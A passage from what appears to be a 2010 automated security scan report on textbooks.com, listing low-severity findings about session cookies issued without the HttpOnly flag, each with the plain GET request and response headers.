qR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=lWW7095Hg1ig8uQW8L4tHoLuc%2FIHIv69fbY%2F7AeSB39DPMmHu7wprb0Q0HEuveRv%2FF6JHL43wqoIKy9W9TrEcCjN66qOeeK7DMBiEcghYgg43a1eRWpySFlrfs0nzwjAeELsCPucykDEds%2FaasQo%2BMz913BNOMqADlkMonkYW9MBONQh0NN7%2Bgn00j1ZrzgQwqf0OUeb9BDYW21oVsj%2FdJdR0akhOZK%2F51wY6BfRV5EgGTM65n%2BFRNRya%2BiLb7JahucPeAbl9x%2BmhOOnO9%2B3vXyI6sQBNk%2BTY5acFyexwVXFLhMPsgJOHhbbt5Xu5IdSMPJ5mwbFVdFqPn0G23%2FsgxWXSWdGDnwAjpfPCi7szYoWTvS4LGvp0bPyoGV64TqdRQST3gkjLXC%2BbjahLgjKOqTj%2FbzQT73DSfMceGTBMfbq%2FkPKTmPT%2FGtUuHOaMhZnFCbq%2B1myev%2BXhT27fOdn4BM6L%2Fq%2FAOHmmRRCrMvZYIIaKogio7haqhIXuzppk1jI5qJaX1kozxHPq5IWmDhRpQLku0MYJlkkU3BbvxgM9zc1ytri%2BSShq9%2FhTtxdwvxu6fP54Qbb639bOftEwkkZ17oex1B%2BbtT08sH6SDsD1RAWJbMd%2FZhco949cbNtw%2FQDSx1DqDAkQoXh%2BduOs%2BSDVxd%2BRU7UcSMHjn5l9oZNqgudx4QOQStpPUhUB%2BQzChVikzK6JsdK%2Fog4ubjTvS2hMxgCLw25pkiH%2B1XnQzeR59%2FWJX%2BOFhdfEbdfCHehsxmIBAcgQ49heBG%2BGipmvLn7TmbTDe51UHYZtp%2FpPMKf%2By8P26TxRMmcJHiJpCosEzKZpVrFuwfiphEoFflcxAxA3kcAMm8pOOlf1FYYkPSvwRCejf5OPPOdLo5KJ0Cpru9WBOvS8%2Finc%2Bqll%2FnFeyHvvk0rWbc3ijPVV7DAaVu8ebTjdB1nJBgYz6ebzHnYvLfhG0DSmbFSifE5Ec7auE2okDMny0YRaQ%2BWN3TokOyNLEKwxuMkCpS0V3kJhmIMjdidEBg97nDyiD8SeC1jRSMxmi3VZ2KHlEn6Z2yfS%2FK2QEf8d19bM3zDIKDLov320SsOOGFH5KTfGYqYqb2rHg8%2FtVYEOATQx92S736NdiA6MdC2IE5Jiufr6Vp4xzmBa8OMrZl8qPdzXdVUks5bTTqiZiZl9UK0X4aE0JsDz6YYNh1MYd8JYJImlyClsU%2FFSyB8h5q54jI2zcv%2FZ0fTzLxvWyE%2FLW5L3yLANRhETaRLMB7IOL3Gu011Zc3dPr0%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=r9T1CLykg7iNlM9mW4g%3D; expires=Mon, 26-Dec-2011 13:52:47 GMT; path=/; domain=.textbooks.com
Content-Length: 124683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.19. http://www.textbooks.com/Catalog/S/Social-Sciences.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/S/Social-Sciences.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/S/Social-Sciences.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=xRQX55189n8zA%2FwnIp1C0b%2F9aBYes8fGlayALGU4Y%2FO38uipRddVmnRDHMN4k%2BItUZODbUe8ekOmkjKJiKXhFx1uP%2F9mLKCdMr4rA%2F7hQ%2B%2BzmI9Ov89MnWeZKHmKi0UT%2FEwu368A%2Bh0LAhbUJMD1ZLPSU9cYltYN2hv03GIZ%2BU8Xz7hlQRm4YQ0%2B6wRLn9EUrpd%2FF716MjY2ZCO3%2BUot8DYeFpodOjX%2FKOYYx0t3KsVyAKRubho5BMJh%2Bfyy%2BJXDdRGM%2FyJIX80Ee46YKxd9y4ZxQnorvbw6O%2Fx3jO9KGLjeSewCeNj0rwbQ5RkaseMHh9OMScRKZQOm18NARKFo7%2B6jQy2eX%2FjVaA1JtXFrUjWCJQvcXaNfglwVJmgYzROpgyK1JSAMBffOZOp5%2BPA9dM2V1HbkWc7pr4U5dYc8zXzBVi4GiT4%2BQpuX9q6yaOWWx9GSLClmeMt76kvQ4M3TStY7mXT9Qxr4EtUIj6qWHcuD9060xc%2BMCD3IpEA44dzi%2FasaSBjO5juu1heSznTBD5NvGwg7eNQ%2FGdoyKJQc7sVHAAoMdxqVF6UatbucxEh04tC3j1tgpSOUrNnfuSV%2BJvHk0NXKZd1NQPCKONaZArniF2A3oMN%2BAnzC14T6R%2Fk91cNFcBvKfMOvqoYyRykzFJUhgA8M4rYmxkm981YU7pPy2Ob8kdrg71TWG2yMtt0%2F4ZLDhxSGghzbSRUVX07N121ZGHsXtHXx3dEwsm0jUYQBBHxQyJDsEnrBw55GW80Ts1NkLVgP%2Fz9nevbJ28rFTrs5XegaNssPcaIofSADlpaKYPKxDtdslIBlz1LsBkZ%2B0V0s6KMNBpQloypKpkScwlDGj%2BHUrnAOexucfo%2BJ1O1ztRiJKFDzyfWN5C9Q3YsftQpVqYZ5NCyxOswNcNhzG1QHvm9QCs7lsuhZQq%2F0X3jQeR3jKmWP5xX6E6NNSX%2F17h5Tk%2F5rgyR2GC%2BDBBcJ7jtjd1Ivhre6NrHXV7fj%2B0r514Xc61RwSQV7hDzpo4aE3U0opmnLBXLw2Wsr2NsLihuZdg6GKV614VLtP8hWTIEciJii35QFPM82aSebcStWKxDdVT9jui%2F9HDiwrNRZt%2BC%2F5Vxoeg%2F5jNbhkQ3ybr6ADZw1nuxUCZem%2BlXmqYvrKgNEbngd5EXIf1c8a17ZwvFECJqUxCpbXVfq2yGeGhdPhPrxsZAVkGgO3aSDFZnm4OoiZLZQ4VHpPyAqec2X1vww5h%2FRIzeekFWbnCtNVHopWLG71yEY2nrxMKo%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=fu4pT4XxuU2DnO1wKnI%3D; expires=Mon, 26-Dec-2011 13:52:55 GMT; path=/; domain=.textbooks.com
Content-Length: 149776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.20. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=1gyLXHBIfSMKPz%2Fw5IiqSbZ6agOmagd%2B9zhguG5Vt%2BrxTeTjBNSgMTE7jL8Ji9QU4cdawByalwZL9n0brAdnFudnztnjTPBayhZPb8FpYWBkinyNXyQdxVVhl5ADyHN7Njc%2Bi9tOVckiAE%2FXrUokgWoLMgOYdhEafJyJ%2BINyX0WJDiBkhSsaAman7d0oTEWEivU3sWpP5hQbmrdICIewCkt%2F7uPfp8wxtXCmAxB%2BYBEDAaLX5ZHAtj4lasxbloPgb06LFNhEyx1jVTQj%2BUSIDEBNonP9XMNVWzZWwTlf%2BgCtZLYRQ9PFG1B%2BlGJ1m77fMCei8JR89%2Bp2NVJsULWKsIsRVv1f81n3k6LqWDQHLqX51sZ6qVB3By3MhsKrJcOS6wtZAmt7Y5pqbH%2F0v8n942mb4lb934eNLnC4MtRXXyL9XO%2FHaWJ%2F2DeQ4AuEAC2rP9p1AsBnHmNjfUkgt8waYfeUUqUMYPopyN0dTpvblsPc9lBc3Ao3MfzqpMsn2VThteurH9p02FcyYbn8iyxD7tBncAz89FtZ0tHo8DspQb7w%2FxVhbUm5cahrdkSKNNlOO8whuXah9Kg9DvtjUDSDnsGlLAmbe5NLTsnsznKJVZyGqw2KRNaeKXNFqGYN5OO69dPPzDl%2BOoDa678%2BMW2%2BNdVhu%2Fdcje0SDbimNqwdLIVwi%2FvjnvxYfgKF08j9beUaRUYcWPehchsKK11UbkrWdicvDPYqSKDYqJKWC8G3Nr2c11u%2Fl4YlaR00WOldYB0fVgyvQx%2FdFwEvShbLYN%2FWhHBGfZ%2BkQWkFFyqxSV07OtqD4sY%2BBJo4PrfsOcj%2B1XFFCXvnXdwL0nyeCYLHWtMjVQmgFKOquaZlGZGzZoucbjoYjgotpgVGX1HbAkcTGm%2F14VbafyhS3eVWfs5rfLWL4qC6sKq26y%2FgcMDcaVlyYw0SFFuJbxW3QSWciW%2Fc8Cq62edTkCGrq%2FkC20F9yiqEJo5aQ5z1zofKQ1J278fbiNIqV5JrVkUmpa1isbRPwzZl9DqbrqoXFN683FiZF0szTmPFyUWnTXh%2BCZlIjSEoo%2Fgs5UNQScJg7HIYy9Jp3MJAREly8HnXCCPRw8Rpnyl2gp%2FkOl5ebcOf2xNJeXfT6KN0YBalioHGw0BzmqdHy0WZlOmdzpsbn4jPmtrj2TH1htEHHTLzPL6lPAB6vW1VRvrJECH7CHpt715eZZKt8ORsi7L06jU75greL4IaQR850zQeoOi4V0XPnwMk%2FvZnPxOk0w2Z2%2BarOdrS5NY%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=RYtl1QdxWBaKvyvtQEw%3D; expires=Mon, 26-Dec-2011 13:52:06 GMT; path=/; domain=.textbooks.com
Content-Length: 155433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.21. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/V/Vocational-and-Professional-Education.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/V/Vocational-and-Professional-Education.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=diw23%2FKe3OZGzz7eXeDf5b7KG%2FcZmVR6hXoB8ZAZa7nnEqe5l45%2Bqp5xSSlixethcaKgByLIR2W0HXRNyDrZmJa3qk2F7zxApcKGthtBvd784CeWA4Bz0qGxT3yzHSCpUBtLGIz9Fc%2FG7QfiJnfTRM8OgB8P45M%2BHAmeRL1hxvaXZl4%2BhIKyUPEzLIDFnExvi1kk5fSLqZ9D14N2OSxYx4EyqjiJlEFj97Bpitlix3zA79OnNtNMqrV%2FXE7hWVP4aCOrCzZN5%2FoA%2BXebh%2Bcpj%2B8ldGrRG1noPkNbfwZXDOtl1YYcyUNamKCdxTJOua6CbVHeAiKBYLz%2BwgXw0Xla6UhKpp3HGuDQqj6LtCcAvjh7znRvVS%2FCDUYKRCViqno%2BPMQG1yWYDsSrvqY%2BtpCRE4%2Bv3QNdKU%2FbYJ8yz%2BXumN9wSBqQIr623SjzpRWrIc1aVNk0MLTHAarTQO2XdxSJ8Ns31xQic7T%2BZZkNFpLb%2Fz%2FNCJu8ZhqpdOYClKWyZ%2B6m0sKgj8UNbBI6CewScnr3I%2FiZhaF8iNmwalJQQ4QC4hGQA0wTxW5LdJTzZDZMJS0I0TUU12QyTk7iYBtK95GjkCNeLFM1%2BDPS6vrL0YLQQSYkfZETlYLev03pCSTKLSWSKNRcLSu4nYkAA5gxVMAVNYpux2tIegYT1ad8COQhZ2tW3M76Twdb2xYEh3bK020hXCcOKChAVqGUxnvOLO8%2F4YxnqnxNch5SoDLL9Mf0xTV%2B%2B0Fp6RlkuNKDywxfTxHFL6GSoYDrFmtEGz6LzPddsCFgEQzN0bifaAavc3DQdmCWTWaGdwkSsQONOpOBNLRD3XduHem%2FTnbkl7YoB7elZKarX2JdzFAfglwd2F9F7nIgcpsJuGva%2B7j6zNW4kvsuZ4evbv6DHJZCeqUacnU79XoloCbS%2FdNzRg5XgATUzjwQA4LDDGbmQRLLEK0Bvr3sT3S2Ry6Ltx5L4eDsFbqABjN%2FjvJCICcP0YWNOSl3Fuu0SA6O0QIp7jcYr7wGaLNHoKrWHRun34v7UiTQ9BZyTxXFTLc1NZfccF%2BmfaLMrQAROi0AWzO3SuzESJaZTmIbQcanPUdrwzIMiTL0WGCb6MJAgbtMYk333%2Fu%2F6btRLLvMCwAknVNCGjUHxZeNxRmnXZVbei6DaaKvKsLGn86GU%2Bc5RGQcalORxKRRAPkRN%2F478lT9Z2EknlPyqpXa41GUv7pzfAx6y9gRqE89gdkFBhNkJP9JQqc68ostt6UMxlruOMlyL%2BZcNo6wpW4%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=gDudYol3rrcVRWT6jO4%3D; expires=Mon, 26-Dec-2011 13:52:56 GMT; path=/; domain=.textbooks.com
Content-Length: 116160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.22. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:05 GMT
Connection: close
Connection: Transfer-Encoding
